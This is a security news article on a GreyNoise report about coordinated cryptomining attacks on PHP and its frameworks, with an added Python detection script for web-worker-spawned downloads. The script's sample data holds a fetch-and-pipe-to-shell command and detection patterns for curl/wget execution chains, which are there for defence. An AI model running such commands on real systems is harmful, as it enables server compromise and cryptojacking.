Analysts at GreyNoise Intelligence have reported a sharp, coordinated surge in attacks exploiting vulnerabilities across PHP and its frameworks—including ThinkPHP, PHPUnit, and the recently disclosed CVE-2024-4577—as cybercriminals rush to deploy cryptominers ahead of what they call a “high-profit window” driven by soaring cryptocurrency prices.
According to GreyNoise’s latest network telemetry, “From August through October 2025, we observed a clear ramp-up in exploitation attempts against PHP and PHP-based frameworks as actors push to deploy cryptominers.” The team’s sensors recorded seven distinct attack patterns running in parallel, “steady in August–September, then spiking into October and November.”
The most active campaigns exploit ThinkPHP Framework LFI (CVE-2022-47945), PHP CGI (CVE-2012-1823), and PHP CVE-2024-4577, all showing steep growth curves since late Q3 2025. Even legacy exploits like ThinkPHP Code Execution (CVE-2019-9082) and PHPUnit RCE continue to register 50–150 attack attempts per day, indicating that “older chains still produce meaningful volume.”
GreyNoise’s network graph suggests a deeper connection between these campaigns: “The network graph implies these campaigns aren’t independent—they share infrastructure and tools, pointing to coordination or communal tooling.”
The report highlights how cloud service providers dominate the attacker landscape.
“Cloud providers constitute the majority of attacking IPs. Top offenders by IP count include Cloudflare (1,000 IPs), DigitalOcean (688), Google (536), and Contabo (512),” the researchers wrote, noting that “the top 21 organizations account for about one-third of all attacking IPs—a mix of compromised customer VMs, misconfigured services, and rented infrastructure used for mining at scale.”
Geographically, attacks are truly global—with hosts traced to Germany (Contabo, Hetzner), Taiwan, China (Volcano Engine, Huawei, Alibaba), and North America. The analysts conclude: “Attackers are simply using whatever compute they can either rent or compromise.”
The timing of the campaigns aligns with renewed profitability in the crypto market. GreyNoise links the attack wave to Bitcoin’s price surge above $110,000 and the global market cap topping $3.71 trillion.
The report positions cryptomining as a “commodity crime” rather than a niche tactic:
“Cryptomining is attractive because its economics favor stealth and scale. Unlike ransomware, which requires victims and payment infrastructure, mining converts compute to coin with minimal friction.”
Throughout 2025, cloud cryptojacking activity rose roughly 20%, confirming that threat actors are industrializing the practice. “The playbook is straightforward: scan, compromise, deploy a miner (binary, Docker image, or script), and funnel rewards to mining pools controlled by the attackers,” GreyNoise says. “Victims pick up the electricity and infrastructure cost while attackers collect the proceeds.”
Automation plays a key role. With pre-built exploit kits and miner templates widely available, a single automated exploit chain can compromise hundreds of identical targets across the internet. “Often, a successful chain of automated steps—probe, exploit, payload fetch, execute—is all that’s needed to get mining capacity online,” the report notes.
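The "payload fetch, execute" step of that chain leaves a recognisable process lineage: a PHP web worker spawning a shell that runs a downloader. The following detection, added here as an illustration and not taken from the GreyNoise report, walks constructed process-creation events (the field names pid/ppid/comm/cmd are an assumption modelled on typical EDR or auditd exports) and flags fetch-and-execute activity whose ancestry leads back to a web worker.

```python
import re

# Added example, not GreyNoise's code. Process names and the event schema are assumptions.
WEB_WORKERS = {"php-fpm", "php-cgi", "apache2", "httpd", "nginx"}
FETCHERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash"}
# A downloader piped into a shell, or chained into chmod / direct execution, in one command line.
FETCH_EXEC = re.compile(r"(curl|wget)\b.*(\|\s*(ba)?sh|&&\s*(chmod|\./|sh\b))")

# Constructed sample events: one benign cron fetch, one benign PHP worker child,
# and one fetch-and-execute chain rooted in php-fpm.
EVENTS = [
    {"pid": 100, "ppid": 1,   "comm": "php-fpm", "cmd": "php-fpm: pool www"},
    {"pid": 101, "ppid": 100, "comm": "sh",      "cmd": "sh -c curl -s http://example.invalid/x.sh | sh"},
    {"pid": 102, "ppid": 101, "comm": "curl",    "cmd": "curl -s http://example.invalid/x.sh"},
    {"pid": 200, "ppid": 1,   "comm": "cron",    "cmd": "cron"},
    {"pid": 201, "ppid": 200, "comm": "curl",    "cmd": "curl -s https://example.invalid/health"},
    {"pid": 300, "ppid": 100, "comm": "php",     "cmd": "php /var/www/app/artisan queue:work"},
]


def find_payload_fetches(events):
    """Return pids of downloader or fetch-to-shell processes descended from a web worker."""
    by_pid = {e["pid"]: e for e in events}

    def has_web_ancestor(e):
        seen = set()  # guards against cyclic or malformed ppid data
        while e["ppid"] in by_pid and e["ppid"] not in seen:
            seen.add(e["ppid"])
            e = by_pid[e["ppid"]]
            if e["comm"] in WEB_WORKERS:
                return True
        return False

    hits = []
    for e in events:
        suspicious = e["comm"] in FETCHERS or (
            e["comm"] in SHELLS and FETCH_EXEC.search(e["cmd"]) is not None
        )
        if suspicious and has_web_ancestor(e):
            hits.append(e["pid"])
    return hits


if __name__ == "__main__":
    print(find_payload_fetches(EVENTS))  # [101, 102]
```

The cron-driven curl and the PHP queue worker are left alone; only the shell and downloader whose parent chain reaches php-fpm are reported.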
PHP remains an enduring target because it powers the majority of the modern web. With PHP driving roughly 75% of all websites, attackers benefit from a near-limitless attack surface. The exploited vulnerabilities span over a decade (2012–2024), which “highlights a core problem: old vulnerabilities don’t go away just because they’re old.”
If Bitcoin’s historical November trend holds, the compromised servers will deliver outsized returns. “If November follows historical patterns and prices climb materially, deployed miners will earn significantly more than they would have months earlier,” the report concludes.